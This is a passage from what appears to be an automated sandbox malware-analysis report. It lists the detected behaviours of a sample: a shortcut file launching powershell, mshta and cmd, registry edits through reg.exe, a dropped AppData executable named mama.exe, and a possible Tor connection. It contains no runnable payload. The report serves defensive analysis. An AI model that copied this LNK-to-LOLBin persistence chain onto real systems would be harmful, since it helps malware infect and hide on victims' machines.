DC982CA6E51DE08FAEE2B7B87DC3B7D2556D18306A68F6827EB9C7A69CEA51744AC77093A6DDAFBEDE1293F9BE816EBB61F0AD6D7C6984F007AD085896B84A1791374AE2D29767FA6682B78E157C46B6B622FB0CC14FD5ACF701F64474B5D1AFBAD672C4E15EFFE1CA5FBB418A59AB3CE357C55B1CC5C02697ED0B7DC5750FF0A46291413A4591CFD4E3B029F565168AF5EE6C643BABA78A73E0E7F2E781A6F2BB5B74B6D360125440C06278E8E7AC7A76D248DB1E208518388F10A6BAB46D4C01520D56940CD56758727E9268671527569A7159B1296762DE8D769DDAF8005189ED580C0A99027D6D7C7986C91BB71BEB4CF71419813DE3CC12B2BEFEA0BD89C8803D19D50F5348E88EB7A49F42528FCF43AA90404EF92E9CD2FDJump to behavior
          Source: C:\Users\user\AppData\Roaming\mama.exeCode function: 46_2_03525340 LoadLibraryA,GetProcAddress,NtQueryVirtualMemory,NtQueryVirtualMemory,46_2_03525340
          Source: mama.exe.16.drStatic PE information: section name: .didata

          Persistence and Installation Behavior

          barindex
          Windows shortcut file (LNK) starts blacklisted processes
          Source: LNK fileProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          Source: LNK fileProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          Source: LNK fileProcess created: C:\Windows\System32\mshta.exe
          Source: LNK fileProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          Source: LNK fileProcess created: C:\Windows\System32\cmd.exe
          Source: LNK fileProcess created: C:\Windows\System32\cmd.exe
          Source: LNK fileProcess created: C:\Windows\System32\cmd.exe
          Source: LNK fileProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          Source: LNK fileProcess created: C:\Windows\System32\cmd.exe
          Source: LNK fileProcess created: C:\Windows\System32\cmd.exe
          Source: LNK fileProcess created: C:\Windows\System32\cmd.exe
          Source: LNK fileProcess created: C:\Windows\System32\cmd.exe
          Source: LNK fileProcess created: C:\Windows\System32\cmd.exe
          Source: LNK fileProcess created: C:\Windows\SysWOW64\cmd.exe
          Source: LNK fileProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeJump to behavior
          Source: LNK fileProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeJump to behavior
          Source: LNK fileProcess created: C:\Windows\System32\mshta.exeJump to behavior
          Source: LNK fileProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeJump to behavior
          Source: LNK fileProcess created: C:\Windows\System32\cmd.exeJump to behavior
          Source: LNK fileProcess created: C:\Windows\System32\cmd.exeJump to behavior
          Source: LNK fileProcess created: C:\Windows\System32\cmd.exeJump to behavior
          Source: LNK fileProcess created: C:\Windows\System32\cmd.exeJump to behavior
          Source: LNK fileProcess created: C:\Windows\System32\cmd.exeJump to behavior
          Source: LNK fileProcess created: C:\Windows\System32\cmd.exeJump to behavior
          Source: LNK fileProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeJump to behavior
          Source: LNK fileProcess created: C:\Windows\System32\cmd.exe
          Source: LNK fileProcess created: C:\Windows\System32\cmd.exe
          Source: LNK fileProcess created: C:\Windows\SysWOW64\cmd.exe
          Uses cmd line tools excessively to alter registry or file data
          Source: C:\Windows\System32\cmd.exeProcess created: reg.exe
          Source: C:\Windows\System32\cmd.exeProcess created: reg.exe
          Source: C:\Windows\System32\cmd.exeProcess created: reg.exe
          Source: C:\Windows\System32\cmd.exeProcess created: reg.exe
          Source: C:\Windows\System32\cmd.exeProcess created: reg.exe
          Source: C:\Windows\System32\cmd.exeProcess created: reg.exe
          Source: C:\Windows\System32\cmd.exeProcess created: reg.exe
          Source: C:\Windows\System32\cmd.exeProcess created: reg.exe
          Source: C:\Windows\System32\cmd.exeProcess created: reg.exeJump to behavior
          Source: C:\Windows\System32\cmd.exeProcess created: reg.exeJump to behavior
          Source: C:\Windows\System32\cmd.exeProcess created: reg.exe
          Source: C:\Windows\System32\cmd.exeProcess created: reg.exe
          Source: C:\Windows\System32\cmd.exeProcess created: reg.exe
          Source: C:\Windows\System32\cmd.exeProcess created: reg.exe
          Source: C:\Windows\System32\cmd.exeProcess created: reg.exe
          Source: C:\Windows\System32\cmd.exeProcess created: reg.exe
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\mama.exeJump to dropped file

          Hooking and other Techniques for Hiding and Protection

          barindex
          May use the Tor software to hide its network traffic
          Source: mama.exe, 0000002E.00000003.1674843230.000000007E870000.00000004.00001000.00020000.00000000.sdmp, mama.exe, 0000002E.00000002.2541685502.0000000003079000.00000040.00001000.00020000.00000000.sdmpBinary or memory string: torConnect
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
